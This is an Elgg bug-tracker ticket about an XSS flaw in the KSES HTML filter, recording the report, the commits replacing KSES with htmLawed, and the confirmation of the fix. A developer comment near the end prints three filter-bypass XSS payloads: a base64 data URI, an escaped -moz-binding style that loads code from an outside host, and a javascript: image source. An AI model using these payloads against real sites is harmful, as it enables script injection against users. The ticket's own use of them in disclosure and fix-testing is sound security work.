Opened 4 years ago
Closed 4 years ago
#1086 closed Defect (fixed)
XSS Exploit in KSES filtered strings (Security issue in elgg 1.5)
| Reported by: | heyho | Owned by: | |
|---|---|---|---|
| Priority: | critical | Milestone: | Elgg 1.5 |
| Component: | Core | Version: | 1.5 |
| Severity: | critical | Keywords: | |
| Cc: | brettp | Difficulty: |
Description
Hi,
A old XSS security issue affecting Kses stills affect Elgg.
see :
http://www.securityfocus.com/bid/28599
http://downloads.securityfocus.com/vulnerabilities/exploits/28599.html
You can try theses proof of concept via the Elgg search engine.
Also, the kses lib does many calls to preg_replace() using the modifier /e
when preg_replace() is called with this modifier, the interpreter will parse the replacement string as PHP code once for every replacement made
Regards
Change History (9)
comment:1 Changed 4 years ago by marcus
comment:2 Changed 4 years ago by marcus
- Summary changed from Security issue in elgg 1.5 to XSS Exploit in KSES filtered strings (Security issue in elgg 1.5)
comment:3 Changed 4 years ago by marcus
(In [svn:3369]) Refs #1086: Fixes specific issues mentioned pending KSES fix / replacement
comment:4 Changed 4 years ago by brettp
(In [svn:3375]) Refs #1086: Added htmLawed plugin as replacement for kses.
comment:5 Changed 4 years ago by marcus
(In [svn:3376]) Refs #1086: Deprecating kses and removing it from core. Version bump.
comment:6 Changed 4 years ago by marcus
(In [svn:3381]) Refs #1086 & #1073: Filtering and captcha have correct install defaults.
comment:7 Changed 4 years ago by marcus
- Resolution set to fixed
- Status changed from new to closed
Closing as this appears to be fixed now.
comment:8 Changed 4 years ago by heyho
- Resolution fixed deleted
- Status changed from closed to reopened
Hi there,
Thanks for your support regarding this bug.
i would like to know where, it as been commited ?
"Latest version (v1.5) RELEASED MARCH 09"
still vulnerable.
Thanks
comment:9 Changed 4 years ago by brettp
- Resolution set to fixed
- Status changed from reopened to closed
It's committed in the latest SVN and will be available in the next release and in the nightly builds.
Confirmed that this issue is present on search results.
Pages which use output views are protected from the first FF exploit:
<a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>
But not the second:
<a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)" href="http://example.com">test</a>
Unable to confirm the opera one:
<img src="%0Bjavascript:alert(document.domain)">
KSES is no longer being maintained as I have mentioned in other issues, therefore +1 for decommissioning it in favour of something that is... I don't want to be in the business of maintaining someone elses dead project.